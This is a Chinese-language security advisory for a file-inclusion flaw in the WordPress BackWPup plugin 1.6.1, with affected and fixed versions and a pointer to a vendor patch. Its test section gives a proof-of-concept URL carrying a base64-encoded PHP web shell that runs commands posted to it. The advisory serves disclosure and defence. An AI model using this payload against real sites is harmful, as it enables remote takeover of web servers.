安全研究
安全漏洞
BackWPup Plugin for WordPress 'wp_xml_export.php'本地和远程文件包含漏洞
发布日期:2011-03-28
更新日期:2012-10-15
受影响系统:WordPress BackWPup Plugin 1.6.1
不受影响系统:WordPress BackWPup Plugin 1.7.1
描述:
BUGTRAQ ID:
47058
WordPress是一种使用PHP语言和MySQL数据库开发的Blog(博客、网志)引擎,用户可以在支持PHP和MySQL数据库的服务器上建立自己的Blog。
BackWPup 1.6.1及其他版本存在安全漏洞,成功利用后可允许攻击者在Web服务器进程中执行任意本地和远程脚本,或获取敏感信息。
<*来源:Phil Taylor
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/_nonce=822728c8d9&amp;wpabs=data://text/plain;base64,PGZ
vcm0gYWN0aW9uPSI8Pz0kX1NFUlZFUlsnUkVRVUVTVF9VUkknXT8%2bIiBtZX
Rob2Q9IlBPU1QiPjxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJ4Ij48aW5wdXQgdHlwZT0
ic3VibWl0IiB2YWx1ZT0iY21kIj48L2Zvcm0%2bPHByZT48PyAKZWNobyBgeyRfUE9TVF
sneCddfWA7ID8%2bPC9wcmU%2bPD8gZGllKCk7ID8%2bCgo%3d
建议:
厂商补丁:
WordPress
---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.tenable.com/浏览次数:2390
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障 |
